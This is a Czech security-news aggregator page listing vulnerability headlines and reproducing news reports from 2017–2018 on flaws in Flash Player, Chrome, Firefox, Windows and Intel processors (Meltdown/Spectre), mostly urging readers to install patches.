- Zranitelnosti -

- Zranitelnosti -

H Aktualizace Analýzy Android Apple APT Bezpečnost BigBrother BotNet Cloud Exploit Hacking Hardware ICS Incidenty IoT IT Kongresy Kriminalita Kryptografie Kyber Mobilní OS Ostatní Phishing Podvod Ransomware Rizika Rootkit Sociální sítě Software Spam Těžařské viry Útoky Viry Zabezpečení Zranitelnosti

Úvod Seznam Kategorie Podkategorie 0 1 2 3 4 5

Datum	Název	Kategorie	Web
11.1.21	Nejděravější firmy a produkty roku 2020: Hlavně Windows a je to dobrá zpráva – Živě.cz	Zranitelnosti	Živě.cz
29.10.20	Oprava chyby Nette: jak jsme si poradili se zranitelností nejvyšší závažnosti - Root.cz	Zranitelnosti	Root
19.10.20	Hackeři útočí na servery s Windows skrze vážnou bezpečnostní chybu Zerologon – Živě.cz	Zranitelnosti	Živě.cz
15.10.20	Máte počítač s Linuxem a Bluetooth? Tak to pozor na novou chybu „krvácející zub“ – Živě.cz	Zranitelnosti	Živě.cz
17.8.20	Bezpečnostní díra v asistentce Amazon Alexa odhalovala osobní informace a historii komunikace – Živě.cz	Zranitelnosti	Živě.cz
20.7.20	Microsoft zalepil 17 let starou bezpečnostní díru SIGRed – otevírala možnost útoku přes DNS – Živě.cz	Zranitelnosti	Živě.cz
12.7.20	Nebezpečné chyby v routerech jsou opraveny. Ale ne všechny - Novinky.cz	Zranitelnosti	Novinky.cz
23.4.20	Eset odhalil zranitelnosti chytrých domácností \| Computerworld.cz	Zranitelnosti	Computerworld.cz
27.3.20	Počet zjištěných zranitelností v roce 2019 vzrostl o dalších 5 % \| Computerworld.cz	Zranitelnosti	Computerworld.cz
25.3.20	Od května 2020 nevychází volitelné aktualizace pro Windows - Cnews.cz	Zranitelnosti	Cnews.cz
25.3.20	Zneužívaná díra ohrožuje nepodporovaný Windows 7 - Cnews.cz	Zranitelnosti	Cnews.cz
24.3.20	Windows obsahují dvě neopravené kritické zranitelnosti - Lupa.cz	Zranitelnosti	Lupa.cz
24.3.20	Nebezpečnou chybu Windows zneužívají hackeři. Oprava neexistuje - Novinky.cz	Zranitelnosti	Novinky.cz
17.3.20	Microsoft vydává záplatu na bezpečnostní díru, která otevírala dveře síťovým červům – Živě.cz	Zranitelnosti	Živě.cz
3.3.20	Miliarda zařízení v ohrožení. Nebezpečná chyba se týká mobilů i notebooků - Novinky.cz	Zranitelnosti	Novinky.cz
3.3.20	Windows 10 v2004 na dosah. Vyšly ISO a další servisní aktualizace - Cnews.cz	OS	Cnews.cz
26.2.20	Chrome ohrožuje vážná bezpečnostní chyba. Google vydal záplatu, zkontrolujte si aktualizaci – Živě.cz	Zranitelnosti	Živě.cz
21.2.20	Tisíce webů na WordPressu v ohrožení: hackeři zneužívají kritickou bezpečnostní díru – Živě.cz	Zranitelnosti	Živě.cz
1.2.20	Nová bezpečnostní díra v procesorech Intel: CacheOut - Cnews.cz	Útoky Zranitelnosti	Cnews.cz
22.1.20	Bezpečnostní díry v GPU Intel, od Ivy Bridge po Comet Lake - Cnews.cz	Zranitelnosti	Cnews.cz
22.1.20	V Internet Exploreru je díra, kterou hackeři aktivně využívají. Microsoft díru opraví, ale asi až v únoru – Živě.cz	Zranitelnosti	Živě.cz
15.1.20	První záplaty roku 2020 jsou poslednímu pro Windows 7 - Cnews.cz	Zranitelnosti	Cnews.cz
15.1.20	Hackeři mohli mít pré. Tajná služba našla nebezpečnou díru ve Windows 10 - Seznam Zprávy	Zranitelnosti	Seznam Zprývy
15.1.20	Bezpečnostní díra ohrožuje 200 milionů kabelových modemů s čipem Broadcom – Živě.cz	Zranitelnosti	Živě.cz
17.12.19	Proč by hackeři útočili zrovna na nás? Zranitelných systémů v ČR může být přes 1600 - Lupa.cz	Zranitelnosti	Lupa.cz
11.12.19	Chyba LocalBridge.exe s kódem 0xc000012f straší uživatele po aktualizaci Windows. Může za ni software Seznamu – Živě.cz	Zranitelnosti	Živě.cz
11.12.19	Apple vydal iOS 13.3. Zpřístupňuje bezpečnostní klíčenky - Cnews.cz	Zranitelnosti	Cnews.cz
11.12.19	Prosincové záplaty vydány. Windows 10 Mobile skončila podpora - Cnews.cz	Zranitelnosti	Cnews.cz
28.11.19	Kazítko v SSD od HPE, chyba zabíjí disky po 32767 hodinách – Cnews.cz	Zranitelnosti	Cnews.cz
27.11.19	Další chyba po aktualizaci Windows 10: v Průzkumníkovi nefunguje klepnutí pravým tlačítkem – Živě.cz	Zranitelnosti	Živě.cz
20.11.19	Ani tentokrát to nejde úplně bez chyb. Poslední velká aktualizace Windows 10 se některým uživatelům „sekne“ – Živě.cz	Zranitelnosti	Živě.cz
20.11.19	Nové chyby v CPU Intel: díra TAA, iTLB multihit a JCC erratum - Cnews.cz	Zranitelnosti	Cnews.cz
14.11.19	Listopadové záplaty jsou posledními pro Windows 10 verze 1803 - Cnews.cz	Zranitelnosti	Cnews.cz
5.11.19	BlueKeep znovu na scéně, Windows jsou pod útokem na zranitelnost - Lupa.cz	Zranitelnosti	Lupa.cz
26.10.19	Poslední aktualizace Windows 10 mohly způsobovat řadu potíží. Microsoft vydal kumulativní opravu – Živě.cz	Zranitelnosti	Živě.cz
9.10.19	Říjnové záplaty pro Windows a přidružené produkty lepí 60 děr - Cnews.cz	Zranitelnosti	Cnews.cz
28.9.19	Volitelná záplata pro IE a další opravy pro Windows - Cnews.cz	Zranitelnosti	Cnews.cz
25.9.19	Microsoft vydal dvě neplánované záplaty – opravují kritické chyby v Exploreru a Defenderu – Živě.cz	Zranitelnosti	Živě.cz
11.9.19	Chyba NetCAT v CPU Intel umožňuje na dálku číst stisky kláves v SSH - Root.cz	Zranitelnosti	Root.cz
11.9.19	Sága RDP zranitelností ve Windows pokračuje - Lupa.cz	Zranitelnosti	Lupa.cz
30.8.19	Vývojář objevil zranitelnost v Seznamu. Dokázal mezi výsledky propašovat zakázaný kód – Živě.cz	Zranitelnosti	Živě.cz
21.8.19	Odhalena chyba v biometrickém systému Biostar 2, uniknout mohlo 28 milionů záznamů \| Computerworld.cz	Zranitelnosti	Computerworld.cz
15.8.19	Nebezpečné chyby mají Windows, Edge i Office - Novinky.cz	Zranitelnosti	Novinky.cz
14.8.19	Microsoft hlásí 93 opravených děr. Zamezuje také šíření červů - Cnews.cz	Zranitelnosti	Cnews.cz
13.8.19	Pozor na ovladače hardwaru. Více než čtyřicet z nich bylo děravější než ementál – Živě.cz	Zranitelnosti	Živě.cz
7.8.19	Jak velký problém jsou „open redirection“ zranitelnosti (nejen) na českém webu? - Root.cz	Zranitelnosti	Root.cz

Populární přehrávač Flash Player je opět děravý. Chybu mohou zneužít hackeři

16.3.2018 Novinky/Bezpečnost Zranitelnosti
V pořadí již druhou kritickou bezpečnostní chybu oblíbeného internetového přehrávače Flash Player musí během jediného měsíce řešit společnost Adobe. Trhlina otevírá v podstatě zadní vrátka do celého operačního systému. S instalací opravy by tak uživatelé neměli otálet.

Jednu kritickou chybu operačního systému řešila společnost Adobe už na začátku března.

Sotva se třetí měsíc roku přehoupnul do druhé půlky, je tu v podstatě ta samá situace v bledě modrém. Flash Player opět obsahuje kritickou bezpečnostní trhlinu. S využitím chyby mohou piráti propašovat do cizího počítače prakticky jakýkoli virus.

Právě proto by uživatelé neměli s instalací nejnovější verze otálet. Stahovat záplatu je možné prostřednictvím automatických aktualizací daného programu nebo prostřednictvím stránek společnosti Adobe.

Častý terč útoků
Flash Player používá na celém světě několik stovek miliónů lidí. Právě kvůli velké popularitě se na něj zaměřují kybernetičtí nájezdníci pravidelně. Podle analýzy bezpečnostní společnosti Record Future cílilo osm z deseti nejrozšířenějších hrozeb v roce 2015 právě na tento přehrávač videí.

To je i jeden z hlavních důvodů, proč se společnost Adobe rozhodla Flash Player sprovodit ze světa. Podle dřívějšího oznámení jej bude podporovat už jen dva roky.

Nebezpečná chyba Windows ohrožuje 500 miliónů počítačů. Záplata chybí

16.3.2018 Novinky/Bezpečnost Zranitelnosti
Výzkumníci z italské Padovské univerzity objevili velmi nebezpečnou chybu v operačním systému Windows, kterou mohou zneužít kyberzločinci. V ohrožení je podle serveru Dark Reading na 500 miliónů počítačů. Alarmující je přitom fakt, že bezpečnostní záplata zatím chybí.

Trhlina se týká systému Control Flow Guard (CFG), který je nedílnou součástí systémů Windows 8.1 a Windows 10.

Pikantní na tom je, že tato softwarová součást osmiček a desítek se má primárně starat o to, aby byly operační systémy od Microsoftu bezpečnější. V podstatě jde o sérii pravidel, která mají útočníkům znemožnit spuštění škodlivých kódů na napadených strojích.

Ochranný systém obsahuje chyby
Jenže výzkumníci z Padovské univerzity zjistili, že při návrhu tohoto systému udělali programátoři amerického softwarového gigantu celou řadu chyb, kvůli čemuž je naopak možné spustit škodlivé kódy, které jinak restrikce CFG zakazují.

Zjednodušeně řečeno tedy kyberzločinci kvůli chybnému návrhu mohou propašovat na napadený počítač viry nebo klidně i mohou celý stroj ovládnout na dálku. A to překvapivě prostřednictvím funkce, která měla uživatele naopak chránit.

Vědečtí pracovníci již takový útok dokázali demonstrovat v praxi. Detaily samotného průniku však tají, aby nedali hackerům přesný návod, jak takové nájezdy na sestavy běžných uživatelů provádět.

Na aktualizaci se pracuje
Podle serveru MS Power User už se celým případem zabývá i samotný Microsoft, který byl výzkumníky na trhliny v zabezpečení upozorněn. Aktualizaci se chystá vydat v horizontu maximálně několika týdnů.

To jinými slovy ale znamená, že chránit se uživatelé v současné době nemohou. Záplata zatím chybí a trhliny v podstatě otevírají zadní vrátka do systému, na která jsou i antivirové programy krátké.

Uklidněním může být alespoň fakt, že přesný návod na úspěšný útok – tedy na to, jak zneužít chybu – zatím kyberzločinci nemají.

Hackeři mohou získat snadno citlivé informace. Kvůli chybě v Chromu

16.3.2018 Novinky/Bezpečnost Zranitelnosti
Na pozoru by se měli mít uživatelé internetového prohlížeče Chrome. Obsahuje totiž vážnou kritickou chybu, kterou mohou relativně snadno zneužít kyberzločinci k napadení cizího počítače. Prostřednictvím těchto zadních vrátek se pak dostanou k citlivým informacím uloženým na disku.

V bezpečí přitom nejsou uživatelé prakticky žádného operačního systému. Trhlina se totiž týká platforem Windows, Mac i Linux.

Na rozdíl od jiných kritických bezpečnostních chyb v případě této zranitelnosti nemohou hackeři převzít kontrolu nad napadeným strojem, případně do něj propašovat nezvaného návštěvníka – počítačový virus. I tak ale dovedou v počítači napáchat poměrně dost škod, kvůli trhlině totiž mohou přistupovat k datům uloženým na disku, a to i k těm citlivým.

Opravu je již možné stahovat
Společnost Google však již naštěstí chybu opravila, nejnovější verze Chrome s pořadovým číslem 65.0.3325.146 ji již neobsahuje.

V případě, že uživatelé nemají nastavenou automatickou instalaci aktualizací, neměli by s jejich stažením otálet. V opačném případě nechávají pro počítačové piráty otevřená zadní vrátka do svých počítačů.

Nainstalovat aktualizaci manuálně je možné prostřednictvím nápovědy, konkrétně v části „O aplikaci Chrome“. Po rozkliknutí této nabídky se uživateli automaticky nabídne instalace nejnovější verze.

Řadu bezpečnostních chyb opravovala společnost Google už na konci ledna. Tehdy Chrome obsahoval rekordních 53 zranitelností, nálepku „vysoce závažné“ přitom měly tři z nich.

Flash Player má kritickou chybu. Masivně ji zneužívají kyberzločinci

3.3.2018 Novinky/Bezpečnost Zranitelnosti
Kyberzločinci si opět vzali na mušku oblíbený program Flash Player, který slouží k přehrávání videí na internetu a po celém světě jej používají milióny lidí. Zneužít se přitom snaží chybu, kterou tvůrci ze společnosti Adobe již dávno opravili. Útočníci ale sází na to, že celá řada uživatelů s instalací bezpečnostních aktualizací nijak zvlášť nepospíchá.
Před novou masivní vlnou počítačových útoků varoval český Národní bezpečnostní tým CSIRT.CZ.

„Útočníci využívají zranitelnost na neaktualizovaných systémech Adobe Flash Player k velké phisingové kampani,“ uvedl na dotaz Novinek Pavel Bašta, bezpečnostní analytik CSIRT.CZ, který je provozován sdružením CZ.NIC.

Mohou ovládnout počítač
Podle něj kyberzločinci rozesílají zprávy a pokouší se přimět uživatele, aby stáhli dokument Word. „Když oběť soubor otevře a povolí makra, nakažený soubor se pokusí zneužít chybu u Adobe Flash Player. V případě, že oběť nemá aktuální verzi aplikace, může útočník převzít kontrolu nad nakaženým systémem,“ zdůraznil bezpečnostní expert.

To jinými slovy znamená, že prostřednictvím chyb mohou kyberzločinci propašovat na cizí počítač prakticky jakýkoli škodlivý kód, případně jej zcela ovládnout na dálku. Mohli by se tak snadno dostat k uloženým datům, případně odchytávat přihlašovací údaje na různé webové služby.

Obrana je přitom velmi jednoduchá – stáhnout nejnovější verzi Flash Playeru, která již trhlinu neobsahuje. To je možné prostřednictvím automatických aktualizací daného programu nebo prostřednictvím stránek společnosti Adobe.

Častý terč útoků
„Společnost Adobe žádá uživatele, aby pravidelně prováděli aktualizace Adobe Flash Playeru a vyhnuli se tak možným útokům, které cílí na neaktuální systémy,“ uzavřel Bašta.

Flash Player používá na celém světě několik stovek miliónů lidí. Právě kvůli velké popularitě se na něj zaměřují kybernetičtí nájezdníci pravidelně. Podle analýzy bezpečnostní společnosti Record Future cílilo osm z deseti nejrozšířenějších hrozeb v roce 2015 právě na tento přehrávač videí.

To je i jeden z hlavních důvodů, proč se společnost Adobe rozhodla Flash Player sprovodit ze světa. Podle dřívějšího oznámení jej bude podporovat už jen dva roky.

Google našel další díru ve Windows 10. Starší verze Windows nepostihuje

22.2.2018 Novinky/Bezpečnost Zranitelnosti
Microsoft si myslel, že chybu opravil, ale zřejmě se tak nestalo.

Byl to opět Google, kdo našel díru ve Windows a informace o ní zveřejnil. Shodou okolností je to druhý případ ve velmi krátkém období. Zatímco zmíněná díra v Edgi byla vyhodnocena jako střední hrozba, v tomto případě se budeme bavit o vysoké zneužitelnosti. To je hodnocení od Googlu, Microsoft pak díře přisoudil nálepku důležité, nikoli kritické.
V nově objeveném scénáři útoku dochází ke zneužití funkce SvcMoveFileInheritSecurity tak, že se vydává za uživatele či uživatelku. Pomocí funkce MoveFileEx se útočnice či útočník pokusí přesunout soubor do jiného umístění. Po vyvolání funkce dojde o opuštění modelu vydávání se za uživatele a k pokusu o resetování bezpečnostního popisovače nového souboru tak, aby odpovídal zděditelným oprávněním.

Chyba CVE-2018-0826
K problému dochází pouze při práci se soubory s pevnými odkazy. Pakliže je soubor přesunut do adresáře, jenž disponuje dědičnými položkami pro správu přístupu, je krátce řečeno možné, aby byl soubor díky zděděným oprávněním modifikován tím, kdo útok provádí. Podle Googlu byly dokonce nalezeny dvě velmi podobné chyby.

Jednu interně označil číslem 1427. Jedná se o chybu známou též pod označením CVE-2017-11783 a byla opravena na podzim. Týkala se přitom všech do té doby vydaných verzí Windows 10, ale také Windows 8.1. Druhý problém, na který Google upozornil po vypršení lhůty pro opravu, (Microsoft si vyžádal prodloužení oproti standardním 90 dnům, čemuž bylo vyhověno), viz výše, reklamní gigant interně označuje číslem 1428 a je známa též pod označením CVE-2018-0826.

Podle Microsoftu se tato chyba týká jen Windows 10. Výměna informací mezi Googlem a Microsoftem naznačuje, že si firmy zcela nerozumí. Redmondští tvrdí, že chybu opravili v aktualizacích, jež vydali v rámci únorového záplatovacího úterý. Chybu 1427 považovali za duplikát chyby 1428. Jenže podle Googlu byla ve skutečnosti opravena jen chyba 1427, zatímco chyba 1428 v systému zůstala.

Takže nejde o duplikát, jen o podobnou chybu. Zřejmě nás tedy čeká další oprava. Tato chyba by naštěstí neměla být snadno zneužitelná. Tedy, její zneužití je snadné, ale podmínky pro takový útok jsou jen obtížně splnitelné. Např. útok nelze provést vzdáleně, nelze jej provést ze sandboxu, který nabízí aplikace jako Chrome nebo Edge apod.

Google zveřejnil detaily k díře v prohlížeči Edge. Varoval Microsoft předem, ale ten chybu včas neopravil
22.2.2018 Živě.cz Zranitelnosti

Živě.cz v prohlížeči EdgeTmavé téma prohlížeče EdgePodporuje další technologie HTML5, třeba WebRTC 1.0, a jak vidíte, dokáže i takto zobrazit miniatury otevřených stránekKlepnutím na tlačítko nahoře vlevo můžete uložit otevřené panely na pozdějiEdge docela dobře zobrazuje PDF a nově se naučil i EPUB
Google zveřejnil detaily bezpečnostní chyby v prohlížeči Edge. Microsoft přitom o chybě věděl dopředu, ale ve stanovené lhůtě nedostatky neodstranil, informoval web Neowin.net.

Tým Googlu prostřednictvím Projektu Zero odhalil v listopadu minulého roku zranitelnost prohlížeče Microsoft Edge a poskytl Microsoftu 90 dní na opravu. Pro složitost opravy lhůtu prodloužili o 14 dní, ale ani po tomto termínu chyba nebyla odstraněna.

Zranitelnost dovoluje útočníkovi obejít zabezpečení prohlížeče a vložit škodlivý kód do počítače oběti. Chyba byla označena jako středně závažná. Microsoft je přesvědčen, že tuto záležitost vyřeší do 13. března. Proč se tak nestalo doposud však blíže nevysvětlil.

Zkontrolujte si, jestli je váš firemní počítač chráněn před chybami Meltdown a Spectre

22.2.2018 SecurityWorld Zranitelnosti
Analytická služba Microsoftu Windows Analytics nyní může prozkoumat podnikové počítače s Windows 10, 8.1 a 7 a určit, zda jsou systémy zranitelné vůči vadám Meltdown a Spectre nacházejícím se v procesorech.

Nová schopnost služby Analytics spadající pod sekci „Upgrade Readiness“, tedy připravenost na aktualizaci, představil Terry Myerson, vrcholný představitel firmy zaměřený právě na operační systém Windows. Myerson zranitelnosti nazval „výzvou pro nás všechny,“ neboť vychází z hardwaru jako takového, nikoli ze softwaru.

„K naší službě Windows Analytics jsme přidali možnost nahlásit stav všech zařízení s Windows, které IT odborníci spravují,“ píše Myerson na blogu Microsoftu.

Windows Analytics je shrnující pojem pro tři různé separátní služby: Upgrade Readiness, Update Compliance a Device Health. Zaměřují se na připravenost počítače na aktualizace a také na samotné „zdraví“ stroje. Vychází z telemetrických dat, která Microsoft z osobních počítačů s Windows získává. Windows Analytics jsou dostupné pouze pro zákazníky s licencí Windows Enterprise.

Služba Upgrade Readiness měla původně odhalovat stroje nejvhodnější k aktualizaci z Windows 7 a 8.1 na Windows 10. Doporučuje také ty systémy, které by měli jako první aktualizovat na nejnovější build, tedy verzi systému.

S aktualizací určenou na ověření zabezpečení vůči zranitelnostem Meltdown a Spectre ukáže služba IT administrátorům, zda je antivirový software počítače kompatibilní s aktualizacemi, které Microsoft vydal minulý týden a které mají lépe zabezpečit počítače vůči oběma zranitelnostem.

Upgrade Readiness také určuje, které systémy jsou již proti Meltdownu a Spectru chráněny a ty PC, které mají aktualizace dočasně deaktivovány. Poskytuje rovněž informace o aktualizacích firmwaru, které ve spolupráci s Microsoftem vydává Intel.

Protože Meltdown i Spectre se nachází přímo v procesoru, je nejlepší obranou právě aktualizace firmwaru (tedy kromě celkové fyzické výměny procesoru). Zpočátku se bude Upgrade Readiness zaměřovat jen na Intel, ale podle Myersona „přidáme i CPU partnerů hned jak budou data o nich dostupné Microsoftu“.

Zack Dvorak, programový manažer Microsoftu však varuje, že uživatelé mohou zprvu vidět množství neznámých nebo prázdných polí při využití služby. „Na vylepšení dat poskytovaných službou Upgrade Readiness pracujeme a nové informace vám zobrazíme hned jak to bude možné.“

Microsoft vydal nový update Windows, řeší restarty kvůli chybám čipů Intelu

31.1.2018 SecurityWorld Zranitelnosti
Intel nedávno varoval uživatele, aby si nestahovali firmwarové aktualizace, vydané za účelem řešení zranitelností Spectre a Meltdown, protože způsobovaly náhodné restartování systému. Microsoft na to o víkendu reagoval vydáním aktualizace KB4078130.

Bezpečnostní aktualizace deaktivovala předchozí nestabilní záplatu. Nová aktualizace je reakcí Microsoftu na týden staré oznámení, které zákazníky firmy – podniky, výrobce i koncové uživatele – varovalo před nestabilní záplatou.

Podle Intelu může nový firmware „může způsobit neočekávaně vysoký počet restartů a dalších nepředvídatelných systémových reakcí na procesorech Broadwell a Haswell.“ Tyto stále ještě rozšířené čipy pochází z let 2015 a 2013.

Microsoft na nepříjemné zprávy reagoval odstraněním mitigací pro jednu ze tří zranitelných oblastí, které Meltdown a Spectre zasahují.

„Naše vlastní zkušenost je, že nestabilita systému může v určitých případech způsobit ztrátu dat,“ potvrzuje v podpůrném dokumentu k nové aktualizaci Microsoft. „Zatímco Intel testuje, aktualizuje a nasazuje nový mikrokód, my zpřístupňujeme aktualizace KB4078130, který specificky ruší mitigaci CVE-2017-5715 ‚Branch target injection vulnerability‘. V našem testování se ukázalo, že tato aktualizace popsané chování blokuje.“

Aktualizace je dostupná pro všechny dosud podporované verze Windows, tedy 7, 8.1, 10 a související Windows Server edice. Spolu s tím Microsoft zveřejnil klíče, které IT administrátorům umožňují v registrech libovolně aktivovat či deaktivovat vybrané mitigace Spectre a Meltdown zranitelností.

Společnost Microsoft dále doporučuje uživatelům, aby poté, co Intel oznámí vyřešení problémů, uživatelé zablokované mitigace znovu povolili.

Microsoft vydal záplatu a počítače s AMD přestaly startovat. Prý za to nemůže
9.1.2018 Živě.cz Zranitelnosti
Microsoft sice vydal první várku záplat proti chybám v procesorech Meltdown a Spectre už zkraje roku, nicméně po týdnu je musel zablokovat. Tedy ne všem – jen majitelům počítačů s některými procesory od AMD.

Oprava totiž zalátala chyby v procesorech opravdu dokonale: Po instalaci nelze nastartovat Windows. To je samozřejmě ohromný problém, Microsoft však v oznámení jednoznačně viní AMD.

Dokumentace k procesorům AMD je plná chyb
„After investigating, Microsoft has determined that some AMD chipsets do not conform to the documentation previously provided to Microsoft to develop the Windows operating system mitigations to protect against the chipset vulnerabilities known as Spectre and Meltdown.“

Podle redmondské korporace vycházeli vývojáři z dokumentace výrobce, ta však prý neodpovídá tomu, jak procesor funguje. A tak se oprava sama stala chybou. Microsoft nyní dle svých slov usilovně spolupracuje s AMD, aby problém co nejrychleji vyřešil.

Klepn%C4%9Bte%20pro%20v%C4%9Bt%C5%A1%C3%AD%20obr%C3%A1zek
Microsoft pozastavil aktualizace Windows na počítačích s vybranými procesory od AMD
Neodpovídající dokumentace není ve světě IT nic nového a zejména bastlíři se tu a tam setkají s neodpovídající oficiální dokumentací třeba k nejrůznějším senzorům. Zpravidla se však jedná o levné čínské výrobce. Pokud se takových chyb dopustilo i AMD, je to nesporně ostuda.

Obří bezpečnostní chyba v procesorech Intel zpomalí stovky milionů počítačů až o třetinu. Problém se týká všech operačních systémů

3.1.2017 Ihned.cz Zranitelnosti

Chyba je přímo v procesorech vyrobených firmou Intel, takže není důležité, s jakým operačním systémem uživatel pracuje.

Chyba v návrhu procesorů Intel umožňuje útočníkům přečíst obsah paměti a zefektivnit útoky.
Problém se týká procesorů od Intelu vyrobených v posledních deseti letech a tím pádem i stovek milionů PC.
Výrobci operačních systémů musí problém odstranit softwarově s výrazným vlivem na výkon.
Intel udělal při návrhu svých procesorů zásadní chybu, která zpomalí chod stovek milionů počítačů s operačním systémem Windows a Linux. Vývojáři pracující na jádru Linuxu se snaží bezpečnostní díru opravit, od Microsoftu se očekává, že aktualizaci vydá v nejbližších dnech, testují ji už uživatelé v programu Windows Insider.

Chyba se dotkne i systému MacOS od Applu, protože není závislá na operačním systému, ale je přímo v procesorech Intel. Totéž se týká velkých cloudových služeb, které mají servery vybavené čipy od Intelu. Bez starostí mohou být naopak uživatelé procesorů AMD, které touto chybou netrpí. Intel ale ovládá 80 procent trhu s počítačovými procesory, a dokonce 90 procent u notebooků a serverů.

V souvislosti s opravou bezpečnostní chyby, která útočníkům umožňuje přístup k chráněné části paměti počítačů, dojde ke snížení výkonu postižených počítačů. Rozdíl ve výkonu se podle předběžných informací může pohybovat od pěti až do třiceti procent podle typu vykonávané úlohy a konkrétního modelu procesoru. Například u databázového produktu PostgreSQL jde v nejlepších případech o zpomalení o 17 procent, v nejhorším o 23 procent.

Konkrétní informace o chybě v procesorech Intel nejsou zatím k dispozici. K jejich zveřejnění dojde podle informací serveru The Register po vydání aktualizace pro Windows. Opravy pro jádro Linuxu jsou už k dispozici, informace o změnách jsou ale utajené. Problém se však týká možnosti aplikací získat přístup k chráněné oblasti operační paměti používané jádrem operačního systému. Toto bezpečnostní riziko lze odstranit softwarovým oddělením uživatelské a systémové paměti.

Chrome obsahuje kritickou chybu. V ohrožení jsou milióny uživatelů

8.12.2017 Novinky/Bezpečnost Zranitelnosti
Kritická bezpečnostní trhlina byla odhalena v oblíbeném internetovém prohlížeči Chrome od společnosti Google. Vzhledem k tomu, že zranitelnost se týká všech podporovaných operačních systémů, v ohrožení jsou desítky miliónů uživatelů z celého světa.
Chrome je aktuálně nejpopulárnějším webovým prohlížečem, což dokazuje i početná skupina uživatelů, která se podle nejstřízlivějších odhadů počítá na desítky miliónů. Právě proto se ale na něj vcelku pravidelně zaměřují počítačoví piráti.

Kritické zranitelnosti, které mohou zneužít hackeři, tak u tohoto internetového browseru bývají odhaleny zpravidla alespoň jednou měsíčně. Koneckonců v ohrožení byli uživatelé Chromu již v listopadu.

Oprava je již k dispozici
A jak je nyní zřejmé, ani v prosinci tomu nebude jinak. Tvůrci totiž tento týden ohlásili, že prohlížeč obsahuje kritickou bezpečnostní chybu. To jinými slovy znamená, že je počítačoví piráti mohou zneužít k tomu, aby do počítače propašovali prakticky libovolný škodlivý kód. Stejně tak ale mohou přistupovat k nastavení napadeného stroje či uloženým datům na pevném disku.

Ohroženi jsou majitelé prakticky všech aktuálně dostupných operačních systémů. Chyba se totiž týká verzí tohoto browseru pro operační systémy Windows, Mac OS a Linux.

Google naštěstí již trhlinu v nejnovější verzi opravuje, stejně jako řadu dalších chyb. Ty však již nemají nálepku „kritické“, ale pouze „důležité“. Pro uživatele by tak neměly představovat žádné velké bezpečnostní riziko, jsou určeny spíše ke zlepšení funkčnosti jednotlivých součástí internetového prohlížeče.

S instalací neotálet
V každém případě není příliš rozumné s instalací updatu otálet. V případě, že uživatelé nemají nastavenou automatickou instalaci aktualizací, neměli by s jejich stažením otálet. V opačném případě nechávají pro počítačové piráty otevřena zadní vrátka do svých počítačů.

Chrome není jediným prohlížečem, který trápí nebezpečné chyby. Tento týden byla kritická zranitelnost opravena například také ve Firefoxu.

Firefox obsahuje kritickou bezpečnostní trhlinu. Útočníci mohou převzít kontrolu nad PC

7.12.2017 Novinky/Bezpečnost Zranitelnosti
Na pozoru by se měli mít uživatelé internetového prohlížeče Firefox od společnosti Mozilla. Obsahuje totiž kritickou bezpečnostní chybu, kterou mohou zneužít počítačoví piráti k infiltraci do cizího počítače. Tvůrci naštěstí již vydali bezpečnostní záplatu.
Před nově objevenou trhlinou varoval český Národní bezpečnostní tým CSIRT.CZ. Ten zároveň upozornil i na to, že opravy pro chybu jsou již k dispozici.

„U Firefoxu vydávaného společností Mozilla doporučujeme aktualizaci na verzi 57.0.1,“ prohlásil bezpečnostní analytik CSIRT.CZ Pavel Bašta s tím, že nejnovější verze prohlížeče s logem ohnivé lišky již trhlinu neobsahuje.

Chyba je kritická. To jinými slovy znamená, že útočníci mohou do počítače propašovat prakticky jakýkoli škodlivý kód. Klidně mohou i na dálku počítač zotročit a využít jej k DDoS útokům, případně mohou samozřejmě i odposlouchávat komunikaci uživatele, která na počítači probíhá.

V případě automatických aktualizací se uživatelé Firefoxu nemusejí o nic starat. Pokud je však tato funkce vypnuta, je nutné navštívit webové stránky tvůrců a nejnovější záplatovanou verzi stáhnout manuálně.

Řada nových funkcí
Firefox se v listopadu dočkal velké aktualizace zvané Quantum, která přidala celou řadu nových funkcí. Má totiž zcela nový vzhled, nové jádro a je výrazně rychlejší než předchůdce.

V první řadě je třeba zmínit nové uživatelské rozhraní zvané Photon. To místo zaoblených panelů sází na ostře řezané linie, působí modernějším dojmem a je přehlednější. Nová domovská stránka nabízí zajímavý obsah pro opětovné navštívení a průvodce, který uživateli ukáže zajímavé funkce Firefoxu.

„Mnoho akcí v prohlížeči probíhá asynchronně, takže jsou rychlejší, plynulejší a neblokují zbytek Firefoxu. Například posouvání stránek (scrollování – pozn. red.), přepínání panelů nebo animace tlačítek použité ve Photonu,“ konstatoval Michal Stanke ze serveru Mozilla.cz.

Celá řada změn se ale dotkla i technické stránky prohlížeče. „Nová CSS knihovna Stylo zrychluje vykreslování stránek. Do Firefoxu se dostala v rámci projektu Quantum – odtud název verze,“ přiblížil Stanke jednu z předností.

Pro Windows 10 verze 1709 vyšla servisní aktualizace KB4051963. Co řeší?

4.12.2017 CNEWS.cz Zranitelnosti
Microsoft v posledních dnech vydával různě aktualizace pro Windows 10. Blíže se podíváme na tu pro nejnovější vydání Desítek.

Probíhá instalace nové verze Windows 10
Probíhá instalace nové verze Windows 10 (Ilustrační foto)
Jsou to skoro tři týdny od listopadového záplatovacího úterý. Někteří ale v posledních dnech mohli obdržet další aktualizace pro Windows nabízející nové opravy. Osobně jsem zaznamenal hlavně KB4051963, jež je určena pro Windows 10 v1709.

Kdo na nejnovější vydání Desítek přešel, může aktualizaci nainstalovat, takže se číslo sestavení zdvihne na 16299.98. Balík byl oficiálně vydán 30. listopadu, byť v Katalogu služby Microsoft Update najdete datum zveřejnění 29. listopadu. Přináší opravy následujících chyb:

Problém se skripty způsoboval selhání Internet Exploreru.
Okno pro zadání textu (od IME) mělo při použití s Internet Explorerem blíže nespecifikované problémy.
V Internet Exploreru mohly nastat problémy s vykreslováním grafických prvků.
V Internet Exploreru mohly nastat problémy s odesíláním formulářů.
Location hash byl ztracen, pakliže jste se vrátili zpět na neplatnou adresu URL.
Aplikace mohly vypovědět funkci, pokud jste použili proxy pomocí skriptu PAC. Mohlo v důsledku docházet k následujícím scénářům:
Outlook se nepřipojil k Office 365,
Internet Explorer a Edge nedokázaly správně vykreslit žádný obsah,
Cisco Jabber přestal odpovídat,
zasažena byla jakákoli aplikace či služba spoléhající na WinHTTP.

Aktualizace KB4051963 řeší mnoho nalezených chyb
Blíže nespecifikovaná chyba způsobovala degradaci výkonu her a jiných aplikací v celoobrazovkovém režimu, které používají DirectX 9. (Že by vyřešení další části potíží objevených koncem léta? Pozn. red.)
Forza Motorsport 7 a Forza Horizon 3 neběžely na některých high-endových laptopech.
